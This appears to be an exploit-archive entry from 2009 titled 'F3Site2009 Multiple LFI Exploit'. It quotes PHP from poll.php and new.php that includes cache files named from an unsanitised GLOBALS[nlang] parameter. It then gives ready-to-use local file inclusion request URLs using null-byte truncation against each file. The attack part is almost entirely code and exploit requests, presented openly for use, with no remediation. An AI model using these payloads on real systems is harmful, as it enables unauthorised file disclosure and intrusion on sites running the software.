[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : F3Site2009 Multiple LFI Exploit
# Published : 2009-12-18
# Author : cr4wl3r
# Previous Title : WordPress and Pyrmont V2. SQL Injection Vulnerability
# Next Title : gpEasy <= 1.5RC3 Remote FIle Include Exploit
##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit ##
## Date: 18-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://code.google.com/p/f3site/ ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code [poll.php] :
if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):
include('./cache/poll_'.$GLOBALS['nlang'].'.php');
~ 3xplo!t :
[F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]
~ Code [new.php] :
if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))
{
include './cache/new-'.$GLOBALS['nlang'].'.php';
}
~ 3xplo!t :
[F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]